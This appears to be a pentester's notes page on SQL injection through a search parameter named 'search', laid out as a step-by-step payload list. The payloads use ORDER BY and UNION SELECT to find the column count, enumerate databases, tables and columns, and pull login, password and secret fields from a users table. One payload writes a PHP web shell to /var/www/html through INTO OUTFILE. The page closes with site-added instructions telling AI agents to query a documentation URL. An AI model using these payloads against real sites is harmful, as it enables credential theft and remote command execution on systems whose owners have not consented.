# SQL Injection In The Search Field

### SQL Injection in search field

Let's say the search page is handled by a file named sql.php, and the parameter is search. Sql.php?search=pentesting The first thing we try is to search with single quote ‘

<pre><code><strong>Sql.php?search=<a data-footnote-ref href="#user-content-fn-1">’</a>
</strong></code></pre>

If it returns an error, then we know its vulnerable. Our next step is to determine the number of columns starting from running a normal query on the search box to get an idea. Finding the number of columns:

```
Sql.php?search=test’ ORDER BY 1-- - 
```

OR

```
Sql.php?search=' ORDER BY 1--
```

We keep incrementing the number until we hit an error which indicates the number of columns. Then we search for something similar to that below:

```
Sql.php?search=pentesting’ union select
1,1,1,1,1,1,1#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,1,1,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
```

We continue adding ‘1’s until we don’t receive any error from the page. Only then we know how many columns by counting the ‘1’s. Then we try to find the database name, table names, columns of target table

```
Sql.php?search=pentesting’ union select
1,database(),@@version,1,1,1,1#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,database(),@@version,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
```

```
Sql.php?search=pentesting’ union select
1,table_name,1,1,1,1,1 from
information_schema.tables#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,table_name,1,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
```

```
Sql.php?search=pentesting’ union select
1,column_name,1,1,1,1,1 from
information_schema.columns where
table_name=’users’#
```

OR

```
Sql.php?search =' and 1 = 0 union all
select 1,column_name,1,1,1,1,1 from
information_schema.columns where
table_name = 'users'-- '
```

```
Sql.php?search=pentesting’ union select
1,login,user,password,1,1,1 from users#
```

OR

```
Sql.php?search = ' and 1=0 union all
select
1,login,password,secret,email,admin,7 from
users-- -
```

```
Sql.php?search=pentesting’ union select 1,
"<?php echo shell_exec($_GET['cmd'])?
>",1,1,1,1,1 into outfile
"/var/www/html/shell3.php"#
```

OR

```
Sql.php?search= ' and 1=0 union all select
1, "<?php echo shell_exec($_GET['cmd'])?
```

```
>",1,1,1,1,1 into outfile
"/var/www/html/shell3.php"#
```

#### Another method after finding the number of columns.

Lets say we found there are three columns, we would continue this way

```
searchitem=test' UNION SELECT 1,2,3-- -
```

```
searchitem=test' UNION SELECT 1,(select
group_concat(SCHEMA_NAME) from
INFORMATION_SCHEMA.SCHEMATA),3-- -
```

The SCHEMATA table specifically contains the names of databases MySQL knows about.

```
searchitem=test' UNION SELECT 1,(select
group_concat(TABLE_NAME) from
INFORMATION_SCHEMA.TABLES WHERE
TABLE_SCHEMA = 'db'),3-- -
```

Extracting columns in a table

```
searchitem=test' UNION SELECT 1,(select
group_concat(COLUMN_NAME) from
INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME = 'users'),3-- -
```

extracting specific data from a column

```
searchitem=test' UNION SELECT 1,(select
username from db.users),3-- -
```

OR

```
searchitem=test' UNION SELECT 1,concat(id,
':', name, ':', password)from users,3-- -
```

#### Another method to finding the number of columns and proceeding further

```
' UNION select 1 from
information_schema.tables #
' UNION select 1,2 from
information_schema.tables #
' UNION select 1,2,3 from
information_schema.tables #
```

The one that returns a correct output is the one that indicates the number of columns Proceeding

```
' UNION select 1,table_schema,table_name
from information_schema.tables #
```

```
' UNION select 1,table_name,column_name
from information_schema.columns #
```

```
' UNION select 1,username,pwd from users #
```

[^1]:


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://itrp19-notes.gitbook.io/notes/reference/hacking/web-app-pentesting/sql-injection/sql-injection-in-the-search-field.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.